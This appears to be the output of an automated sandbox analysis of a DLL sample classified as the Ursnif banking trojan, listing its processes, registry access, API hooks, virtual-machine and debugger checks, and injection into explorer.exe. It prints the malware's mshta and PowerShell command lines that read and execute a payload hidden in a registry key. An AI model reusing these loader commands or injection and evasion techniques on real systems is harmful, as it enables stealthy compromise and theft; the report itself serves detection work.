Source: C:\Windows\System32\control.exe Code function: 38_2_009A2F0C 38_2_009A2F0C
Source: C:\Windows\System32\control.exe Code function: 38_2_009C8320 38_2_009C8320
PE / OLE file has an invalid certificate
Source: 5fd9d7ec9e7aetar.dll Static PE information: invalid certificate
PE file does not import any functions
Source: lcbc4odh.dll.33.dr Static PE information: No import functions for PE file found
Source: 00wddsye.dll.35.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 5fd9d7ec9e7aetar.dll Binary or memory string: OriginalFilenameSetACL.exe. vs 5fd9d7ec9e7aetar.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe Section loaded: msoert2.dll
Source: C:\Windows\explorer.exe Section loaded: msimg32.dll
Source: 44E8.bin.37.dr Binary string: Boot Device: \Device\HarddiskVolume2
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@43/54@6/4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F656A2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_02F656A2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CB1D97F9-3FD1-11EB-90E5-ECF4BB570DC9}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{80E0D293-DF59-B25D-69B4-8306AD28679A}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{BC1CCCFF-EB50-4EB1-55B0-4F6259E4F3B6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_01
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF40EAD1D3FC8CB615.TMP
Source: 5fd9d7ec9e7aetar.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 5fd9d7ec9e7aetar.dll Virustotal: Detection: 12%
Source: 5fd9d7ec9e7aetar.dll ReversingLabs: Detection: 10%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.443921700.0000000004840000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 00000025.00000003.466485518.00000000074E0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000026.00000002.460815536.0000026AEFA6C000.00000004.00000040.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.pdbXPEu source: powershell.exe, 0000001C.00000002.495339304.0000022494A24000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdb source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.pdbXPEu source: powershell.exe, 0000001C.00000002.495201758.00000224949BA000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000025.00000000.461622746.000000000EC20000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
PE file contains sections with non-standard names
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data3
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data7
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data6
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data5
Source: 5fd9d7ec9e7aetar.dll Static PE information: section name: .data4
Uses code obfuscation techniques (call, push, ret)

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6620, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5508, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5128, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10007896 rdtsc 0_2_10007896
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5186
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3748
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F632BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 0_2_02F632BA
Source: C:\Windows\explorer.exe Code function: 37_2_03B70180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, 37_2_03B70180
Source: C:\Windows\explorer.exe Code function: 37_2_03B60C34 FindFirstFileW, 37_2_03B60C34
Source: C:\Windows\explorer.exe Code function: 37_2_03B5A85C FindFirstFileW,DeleteFileW,FindNextFileW, 37_2_03B5A85C
Source: explorer.exe, 00000025.00000000.456781210.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000025.00000000.440682703.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: explorer.exe, 00000025.00000000.461469931.000000000DC36000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 00000025.00000000.438597559.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000025.00000000.449342670.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000025.00000003.470402764.000000001020A000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 00000025.00000000.456890873.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000025.00000003.470452781.00000000101F0000.00000004.00000040.sdmp, 44E8.bin.37.dr Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000025.00000002.647622896.00000000053C4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW;`
Source: explorer.exe, 00000025.00000000.455716541.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10007896 rdtsc 0_2_10007896
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B5D0 mov eax, dword ptr fs:[00000030h] 0_2_0122B5D0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0122B6E0 mov eax, dword ptr fs:[00000030h] 0_2_0122B6E0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 9B851580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: EAE000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 3C30000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 5128
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3472
Source: C:\Windows\explorer.exe Thread register set: target process: 4016
Source: C:\Windows\explorer.exe Thread register set: target process: 4288
Source: C:\Windows\explorer.exe Thread register set: target process: 4448
Source: C:\Windows\explorer.exe Thread register set: target process: 5972
Source: C:\Windows\explorer.exe Thread register set: target process: 5876
Source: C:\Windows\System32\control.exe Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe Thread register set: target process: 6904
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF60C6912E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: EAE000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3C30000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
